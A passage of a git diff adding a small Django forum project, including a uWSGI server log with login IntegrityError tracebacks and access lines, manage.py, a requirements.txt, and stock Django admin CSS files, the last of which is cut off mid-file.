85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 3032/4436] 223.104.212.22 () {48 vars in 928 bytes} [Fri Jan 15 01:46:31 2021] POST /login/ => generated 208721 bytes in 146 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.IntegrityError: (1062, "Duplicate entry '' for key 'uid'") +[pid: 25874|app: 0|req: 3033/4437] 223.104.212.22 () {48 vars in 928 bytes} [Fri Jan 15 01:46:32 2021] POST /login/ => generated 208721 bytes in 100 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3034/4438] 219.228.146.176 () {40 vars in 818 bytes} [Fri Jan 15 01:54:09 2021] GET /all-0-0-0 => generated 13893 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4439] 219.228.146.176 () {40 vars in 892 bytes} [Fri Jan 15 01:54:09 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +Not Found: / +[pid: 25874|app: 0|req: 3035/4440] 83.97.20.29 () {26 vars in 279 bytes} [Fri Jan 15 01:55:42 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 25874|app: 0|req: 3036/4441] 195.154.62.232 () {32 vars in 514 bytes} [Fri Jan 15 02:31:05 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: / +[pid: 25874|app: 0|req: 3037/4442] 83.97.20.29 () {26 vars in 278 bytes} [Fri Jan 15 02:36:47 2021] GET / => generated 3429 bytes in 7 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3038/4443] 219.228.146.195 () {38 vars in 863 bytes} [Fri Jan 15 02:37:22 2021] GET /home/ => generated 11152 bytes in 20 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4444] 219.228.146.195 () {40 vars in 864 bytes} [Fri Jan 15 02:37:23 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4445] 219.228.146.195 () {40 vars in 847 bytes} [Fri Jan 15 02:37:23 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4446] 219.228.146.195 () {40 vars in 886 bytes} [Fri Jan 15 02:37:23 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4447] 219.228.146.195 () {40 vars in 868 bytes} [Fri Jan 15 02:37:23 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4448] 219.228.146.195 () {40 vars in 872 bytes} [Fri Jan 15 02:37:23 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4449] 219.228.146.195 () {40 vars in 866 bytes} [Fri Jan 15 02:37:23 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4450] 219.228.146.195 () {40 vars in 845 bytes} [Fri Jan 15 02:37:23 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4451] 219.228.146.195 () {40 vars in 863 bytes} [Fri Jan 15 02:37:23 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4452] 219.228.146.195 () {40 vars in 861 bytes} [Fri Jan 15 02:37:23 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4453] 219.228.146.195 () {40 vars in 853 bytes} [Fri Jan 15 02:37:23 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4454] 219.228.146.195 () {40 vars in 901 bytes} [Fri Jan 15 02:37:23 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4455] 219.228.146.195 () {40 vars in 895 bytes} [Fri Jan 15 02:37:23 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4456] 219.228.146.195 () {40 vars in 897 bytes} [Fri Jan 15 02:37:23 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4457] 219.228.146.195 () {40 vars in 908 bytes} [Fri Jan 15 02:37:23 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +Not Found: / +[pid: 25874|app: 0|req: 3039/4458] 83.97.20.29 () {26 vars in 279 bytes} [Fri Jan 15 03:14:30 2021] GET / => generated 3429 bytes in 17 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3040/4459] 219.228.146.37 () {38 vars in 757 bytes} [Fri Jan 15 03:31:04 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3041/4460] 219.228.146.37 () {38 vars in 759 bytes} [Fri Jan 15 03:31:04 2021] GET /login/ => generated 6428 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3042/4461] 219.228.146.37 () {50 vars in 994 bytes} [Fri Jan 15 03:31:12 2021] POST /login/ => generated 27 bytes in 70 msecs (HTTP/1.1 200) 7 headers in 324 bytes (2 switches on core 1) +[pid: 25874|app: 0|req: 3043/4462] 219.228.146.37 () {40 vars in 805 bytes} [Fri Jan 15 03:31:12 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3044/4463] 219.228.146.37 () {40 vars in 807 bytes} [Fri Jan 15 03:31:12 2021] GET /home/ => generated 11128 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4464] 219.228.146.37 () {40 vars in 858 bytes} [Fri Jan 15 03:31:12 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 2 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4465] 219.228.146.37 () {40 vars in 860 bytes} [Fri Jan 15 03:31:12 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4466] 219.228.146.37 () {40 vars in 864 bytes} [Fri Jan 15 03:31:12 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 3045/4467] 219.228.146.37 () {40 vars in 814 bytes} [Fri Jan 15 03:31:15 2021] GET /all-0-0-0 => generated 13894 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4468] 219.228.146.37 () {40 vars in 892 bytes} [Fri Jan 15 03:31:15 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4469] 219.228.146.37 () {40 vars in 892 bytes} [Fri Jan 15 03:31:15 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 2 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4470] 219.228.146.37 () {40 vars in 862 bytes} [Fri Jan 15 03:31:15 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 1 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 3046/4471] 219.228.146.37 () {40 vars in 818 bytes} [Fri Jan 15 03:31:20 2021] GET /single/13 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3047/4472] 219.228.146.37 () {40 vars in 820 bytes} [Fri Jan 15 03:31:20 2021] GET /single/13/ => generated 9454 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: / +[pid: 25874|app: 0|req: 3048/4473] 83.97.20.29 () {26 vars in 279 bytes} [Fri Jan 15 03:52:02 2021] GET / => generated 3429 bytes in 26 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3049/4474] 112.65.61.86 () {36 vars in 662 bytes} [Fri Jan 15 04:08:53 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 3050/4475] 112.65.61.86 () {36 vars in 662 bytes} [Fri Jan 15 04:08:54 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 3051/4476] 112.65.61.86 () {36 vars in 664 bytes} [Fri Jan 15 04:08:55 2021] GET /login/ => generated 6428 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) diff --git a/master/manage.py b/master/manage.py new file mode 100644 index 0000000..b352a90 --- /dev/null +++ b/master/manage.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python +import os +import sys + +if __name__ == '__main__': + os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ForumSystem.settings') + try: + from django.core.management import execute_from_command_line + except ImportError as exc: + raise ImportError( + "Couldn't import Django. Are you sure it's installed and " + "available on your PYTHONPATH environment variable? Did you " + "forget to activate a virtual environment?" + ) from exc + execute_from_command_line(sys.argv) diff --git a/master/requirements.txt b/master/requirements.txt new file mode 100644 index 0000000..706c9e0 --- /dev/null +++ b/master/requirements.txt @@ -0,0 +1,59 @@ +appdirs==1.4.4 +asgiref==3.3.1 +atomicwrites==1.4.0 +attrs==20.3.0 +Automat==20.2.0 +certifi==2020.12.5 +cffi==1.14.4 +cfgv==3.2.0 +chardet==4.0.0 +click==7.1.2 +codecov==2.1.11 +colorama==0.4.4 +constantly==15.1.0 +coverage==5.3.1 +cryptography==3.3.1 +cssselect==1.1.0 +distlib==0.3.1 +Django==3.1.5 +filelock==3.0.12 +Flask==1.1.2 +hyperlink==20.0.1 +identify==1.5.10 +idna==2.10 +incremental==17.5.0 +iniconfig==1.1.1 +itemadapter==0.2.0 +itsdangerous==1.1.0 +Jinja2==2.11.2 +jmespath==0.10.0 +lxml==4.6.2 +MarkupSafe==1.1.1 +nodeenv==1.5.0 +packaging==20.8 +parsel==1.6.0 +pluggy==0.13.1 +pre-commit==2.9.3 +psycopg2==2.8.6 +py==1.10.0 +pyasn1==0.4.8 +pyasn1-modules==0.2.8 +pycparser==2.20 +PyHamcrest==2.0.2 +PyJWT==2.0.0 +PyMySQL==0.10.1 +pyparsing==2.4.7 +pytest==6.2.1 +pytz==2020.5 +PyYAML==5.3.1 +requests==2.25.1 +simplejson==3.17.2 +six==1.15.0 +SQLAlchemy==1.3.22 +sqlparse==0.4.1 +toml==0.10.2 +urllib3==1.26.2 +virtualenv==20.2.2 +w3lib==1.22.0 +Werkzeug==1.0.1 +zope.interface==5.2.0 diff --git a/master/static/.DS_Store b/master/static/.DS_Store new file mode 100644 index 0000000..09aa9cf Binary files /dev/null and b/master/static/.DS_Store differ diff --git a/master/static/admin/css/autocomplete.css b/master/static/admin/css/autocomplete.css new file mode 100644 index 0000000..3ef95d1 --- /dev/null +++ b/master/static/admin/css/autocomplete.css @@ -0,0 +1,260 @@ +select.admin-autocomplete { + width: 20em; +} + +.select2-container--admin-autocomplete.select2-container { + min-height: 30px; +} + +.select2-container--admin-autocomplete .select2-selection--single, +.select2-container--admin-autocomplete .select2-selection--multiple { + min-height: 30px; + padding: 0; +} + +.select2-container--admin-autocomplete.select2-container--focus .select2-selection, +.select2-container--admin-autocomplete.select2-container--open .select2-selection { + border-color: #999; + min-height: 30px; +} + +.select2-container--admin-autocomplete.select2-container--focus .select2-selection.select2-selection--single, +.select2-container--admin-autocomplete.select2-container--open .select2-selection.select2-selection--single { + padding: 0; +} + +.select2-container--admin-autocomplete.select2-container--focus .select2-selection.select2-selection--multiple, +.select2-container--admin-autocomplete.select2-container--open .select2-selection.select2-selection--multiple { + padding: 0; +} + +.select2-container--admin-autocomplete .select2-selection--single { + background-color: #fff; + border: 1px solid #ccc; + border-radius: 4px; +} + +.select2-container--admin-autocomplete .select2-selection--single .select2-selection__rendered { + color: #444; + line-height: 30px; +} + +.select2-container--admin-autocomplete .select2-selection--single .select2-selection__clear { + cursor: pointer; + float: right; + font-weight: bold; +} + +.select2-container--admin-autocomplete .select2-selection--single .select2-selection__placeholder { + color: #999; +} + +.select2-container--admin-autocomplete .select2-selection--single .select2-selection__arrow { + height: 26px; + position: absolute; + top: 1px; + right: 1px; + width: 20px; +} + +.select2-container--admin-autocomplete .select2-selection--single .select2-selection__arrow b { + border-color: #888 transparent transparent transparent; + border-style: solid; + border-width: 5px 4px 0 4px; + height: 0; + left: 50%; + margin-left: -4px; + margin-top: -2px; + position: absolute; + top: 50%; + width: 0; +} + +.select2-container--admin-autocomplete[dir="rtl"] .select2-selection--single .select2-selection__clear { + float: left; +} + +.select2-container--admin-autocomplete[dir="rtl"] .select2-selection--single .select2-selection__arrow { + left: 1px; + right: auto; +} + +.select2-container--admin-autocomplete.select2-container--disabled .select2-selection--single { + background-color: #eee; + cursor: default; +} + +.select2-container--admin-autocomplete.select2-container--disabled .select2-selection--single .select2-selection__clear { + display: none; +} + +.select2-container--admin-autocomplete.select2-container--open .select2-selection--single .select2-selection__arrow b { + border-color: transparent transparent #888 transparent; + border-width: 0 4px 5px 4px; +} + +.select2-container--admin-autocomplete .select2-selection--multiple { + background-color: white; + border: 1px solid #ccc; + border-radius: 4px; + cursor: text; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__rendered { + box-sizing: border-box; + list-style: none; + margin: 0; + padding: 0 5px; + width: 100%; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__rendered li { + list-style: none; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__placeholder { + color: #999; + margin-top: 5px; + float: left; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__clear { + cursor: pointer; + float: right; + font-weight: bold; + margin: 5px; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__choice { + background-color: #e4e4e4; + border: 1px solid #ccc; + border-radius: 4px; + cursor: default; + float: left; + margin-right: 5px; + margin-top: 5px; + padding: 0 5px; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__choice__remove { + color: #999; + cursor: pointer; + display: inline-block; + font-weight: bold; + margin-right: 2px; +} + +.select2-container--admin-autocomplete .select2-selection--multiple .select2-selection__choice__remove:hover { + color: #333; +} + +.select2-container--admin-autocomplete[dir="rtl"] .select2-selection--multiple .select2-selection__choice, .select2-container--admin-autocomplete[dir="rtl"] .select2-selection--multiple .select2-selection__placeholder, .select2-container--admin-autocomplete[dir="rtl"] .select2-selection--multiple .select2-search--inline { + float: right; +} + +.select2-container--admin-autocomplete[dir="rtl"] .select2-selection--multiple .select2-selection__choice { + margin-left: 5px; + margin-right: auto; +} + +.select2-container--admin-autocomplete[dir="rtl"] .select2-selection--multiple .select2-selection__choice__remove { + margin-left: 2px; + margin-right: auto; +} + +.select2-container--admin-autocomplete.select2-container--focus .select2-selection--multiple { + border: solid #999 1px; + outline: 0; +} + +.select2-container--admin-autocomplete.select2-container--disabled .select2-selection--multiple { + background-color: #eee; + cursor: default; +} + +.select2-container--admin-autocomplete.select2-container--disabled .select2-selection__choice__remove { + display: none; +} + +.select2-container--admin-autocomplete.select2-container--open.select2-container--above .select2-selection--single, .select2-container--admin-autocomplete.select2-container--open.select2-container--above .select2-selection--multiple { + border-top-left-radius: 0; + border-top-right-radius: 0; +} + +.select2-container--admin-autocomplete.select2-container--open.select2-container--below .select2-selection--single, .select2-container--admin-autocomplete.select2-container--open.select2-container--below .select2-selection--multiple { + border-bottom-left-radius: 0; + border-bottom-right-radius: 0; +} + +.select2-container--admin-autocomplete .select2-search--dropdown .select2-search__field { + border: 1px solid #ccc; +} + +.select2-container--admin-autocomplete .select2-search--inline .select2-search__field { + background: transparent; + border: none; + outline: 0; + box-shadow: none; + -webkit-appearance: textfield; +} + +.select2-container--admin-autocomplete .select2-results > .select2-results__options { + max-height: 200px; + overflow-y: auto; +} + +.select2-container--admin-autocomplete .select2-results__option[role=group] { + padding: 0; +} + +.select2-container--admin-autocomplete .select2-results__option[aria-disabled=true] { + color: #999; +} + +.select2-container--admin-autocomplete .select2-results__option[aria-selected=true] { + background-color: #ddd; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option { + padding-left: 1em; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__group { + padding-left: 0; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__option { + margin-left: -1em; + padding-left: 2em; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -2em; + padding-left: 3em; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -3em; + padding-left: 4em; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -4em; + padding-left: 5em; +} + +.select2-container--admin-autocomplete .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option .select2-results__option { + margin-left: -5em; + padding-left: 6em; +} + +.select2-container--admin-autocomplete .select2-results__option--highlighted[aria-selected] { + background-color: #79aec8; + color: white; +} + +.select2-container--admin-autocomplete .select2-results__group { + cursor: default; + display: block; + padding: 6px; +} diff --git a/master/static/admin/css/base.css b/master/static/admin/css/base.css new file mode 100644 index 0000000..c428519 --- /dev/null +++ b/master/static/admin/css/base.css @@ -0,0 +1,966 @@ +/* + DJANGO Admin styles +*/ + +@import url(fonts.css); + +html, body { + height: 100%; +} + +body { + margin: 0; + padding: 0; + font-size: 14px; + font-family: "Roboto","Lucida Grande","DejaVu Sans","Bitstream Vera Sans",Verdana,Arial,sans-serif; + color: #333; + background: #fff; +} + +/* LINKS */ + +a:link, a:visited { + color: #447e9b; + text-decoration: none; +} + +a:focus, a:hover { + color: #036; +} + +a:focus { + text-decoration: underline; +} + +a img { + border: none; +} + +a.section:link, a.section:visited { + color: #fff; + text-decoration: none; +} + +a.section:focus, a.section:hover { + text-decoration: underline; +} + +/* GLOBAL DEFAULTS */ + +p, ol, ul, dl { + margin: .2em 0 .8em 0; +} + +p { + padding: 0; + line-height: 140%; +} + +h1,h2,h3,h4,h5 { + font-weight: bold; +} + +h1 { + margin: 0 0 20px; + font-weight: 300; + font-size: 20px; + color: #666; +} + +h2 { + font-size: 16px; + margin: 1em 0 .5em 0; +} + +h2.subhead { + font-weight: normal; + margin-top: 0; +} + +h3 { + font-size: 14px; + margin: .8em 0 .3em 0; + color: #666; + font-weight: bold; +} + +h4 { + font-size: 12px; + margin: 1em 0 .8em 0; + padding-bottom: 3px; +} + +h5 { + font-size: 10px; + margin: 1.5em 0 .5em 0; + color: #666; + text-transform: uppercase; + letter-spacing: 1px; +} + +ul > li { + list-style-type: square; + padding: 1px 0; +} + +li ul { + margin-bottom: 0; +} + +li, dt, dd { + font-size: 13px; + line-height: 20px; +} + +dt { + font-weight: bold; + margin-top: 4px; +} + +dd { + margin-left: 0; +} + +form { + margin: 0; + padding: 0; +} + +fieldset { + margin: 0; + min-width: 0; + padding: 0; + border: none; + border-top: 1px solid #eee; +} + +blockquote { + font-size: 11px; + color: #777; + margin-left: 2px; + padding-left: 10px; + border-left: 5px solid #ddd; +} + +code, 